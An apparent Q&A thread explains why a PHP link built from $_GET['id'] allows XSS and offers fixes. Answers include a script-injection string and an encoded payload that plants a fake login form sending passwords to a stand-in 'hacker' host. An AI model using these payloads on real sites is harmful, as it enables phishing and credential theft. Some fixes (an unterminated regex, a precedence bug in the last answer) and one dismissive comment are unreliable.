# Why is this a XSS attack and how to prevent this?

Tags: php, xss

I have this php code and my CMS security auto-test says it's a XSS attack. Why and How can I fix this?

```
$url = "news.php";
if (isset($_GET['id']))
  $url .= "?id=".$_GET["id"];
echo "<a href='{$url}'>News</a>";
```

Comment: What is your CMS? What is the security test?

Comment: if the `$_GET['id']` meant to be numeric value, use http://www.php.net/manual/en/function.filter-var.php or http://php.net/manual/en/function.filter-input.php

Comment: A user could add external parameters to it, say `?id=number' DO SOMETHING DANGEROUS`. However if this does not go through the database, then it shouldn't be an issue.

Comment: @ajreal Why did you ask like that?

Comment: @Elby https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#Why_Can.27t_I_Just_HTML_Entity_Encode_Untrusted_Data.3F

Answer (score 6, accepted):

It's XSS (cross site scripting) as someone could call your thing like this:

```
?id='></a><script type='text/javascript'>alert('xss');</script><a href='
```

Essentially turning your code into

```
<a href='news.php?id='></a><script type='text/javascript'>alert('xss');</script><a href=''>News</a>
```

Now whenever someone would visit this site, it'd load and run the javascript `alert('xss');` which might as well be a redirector or a cookie stealer.

As many others have mentioned, you can fix this by using `filter_var` or `intval` (if it's a number). If you want to be more advanced, you could also use regex to match your string.

Imagine you accept a-z A-Z and 0-9. This would work:

```
if (preg_match("/^[0-9a-zA-Z]+$", $_GET["id"])) {
    //whatever
}
```

[`filter_input`](http://www.php.net/manual/en/function.filter-input.php) even has a manual entry doing exactly what you want (sanitizing your input into a link):

```
<?php
    $search_html = filter_input(INPUT_GET, 'search', FILTER_SANITIZE_SPECIAL_CHARS);
    $search_url = filter_input(INPUT_GET, 'search', FILTER_SANITIZE_ENCODED);
    echo "You have searched for $search_html.\n";
    echo "<a href='?search=$search_url'>Search again.</a>";
?>
```

Comment: Thanks. As @Mene mentioned, should I `urlencode` the input as well?

Comment: @PedramBehroozi You can - it doesn't do anything if it's just a number though - and there's no need to use `urlencode` if you use `filter_input`, as it does it for you.

Answer (score 2):

Yeah .. a simple attach

```
site.php?id=%27%3E%3C%2Fa%3E%3Cbr%3E%3Cbr%3EPlease+login+with+the+form+below+before%0D%0A%09proceeding%3A%3Cform+action%3D%22http%3A%2F%2Fhacker%2Ftest.php%22%3E%3Ctable%3E%0D%0A%09%3Ctr%3E%0D%0A%09%09%3Ctd%3ELogin%3A%3C%2Ftd%3E%0D%0A%09%09%3Ctd%3E%3Cinput+type%3Dtext+length%3D20+name%3Dlogin%3E%3C%2Ftd%3E%0D%0A%09%3C%2Ftr%3E%0D%0A%09%3Ctr%3E%0D%0A%09%09%3Ctd%3EPassword%3A%0D%0A%09%09%3C%2Ftd%3E%0D%0A%09%09%3Ctd%3E%3Cinput+type%3Dtext+length%3D20+name%3Dpassword%3E%3C%2Ftd%3E%0D%0A%09%3C%2Ftr%3E%0D%0A%09%3C%2Ftable%3E%0D%0A%09%3Cinput+type%3Dsubmit+value%3DLOGIN%3E%0D%0A%3C%2Fform%3E%3Ca+href%3D%27
             ^
             |
        Start XSS Injection
```

This would output

```
<a href='news.php?id='></a>
<br>
<br>
Please login with the form below before proceeding:
<form action="http://hacker/test.php">
    <table>
        <tr>
            <td>Login:</td>
            <td><input type=text length=20 name=login></td>
        </tr>
        <tr>
            <td>Password:</td>
            <td><input type=text length=20 name=password></td>
        </tr>
    </table>
    <input type=submit value=LOGIN>
</form>
<a href=''>News</a>
```

Asking your client there username and password to continue and sending the information to `http://hacker/test.php` and they are then re directly back normally as if nothing happened

To fix this try

```
$_GET["id"] = intval($_GET["id"]);
```

Or

```
$_GET["id"] = filter_var($_GET["id"], FILTER_SANITIZE_NUMBER_INT);
```

Answer (score 0):

You'll need to urlencode:

```
$url .= "?id=" . urlencode($_GET["id"]);
```

Answer (score 0):

As a global rule you have to filter the contents of GET and POST. Use filter_var before using the contents of $_GET['id'].

```
$filtered_id = filter_var ($_GET['id'], FILTER_SANITIZE_NUMBER_INT);
// or at least
$id = (int) $_GET['id'];
```

Answer (score 0):

Never use directly $_GET or $_POST!!!
You must escape it some way..
For example ..

```
$url = "news.php";
if (isset($_GET['id']) && $id=intval($_GET["id"])>0){
  $url .= "?id={$id}";
}
echo "<a href='{$url}'>News</a>";
```

Comment: why not? this wasn't stated anywhere. In fact no one said it's a number. It could be a GUID or a string...

Comment: @Mene IDs for many many reasons should be Integers.. 
That is the reason I checked for Int..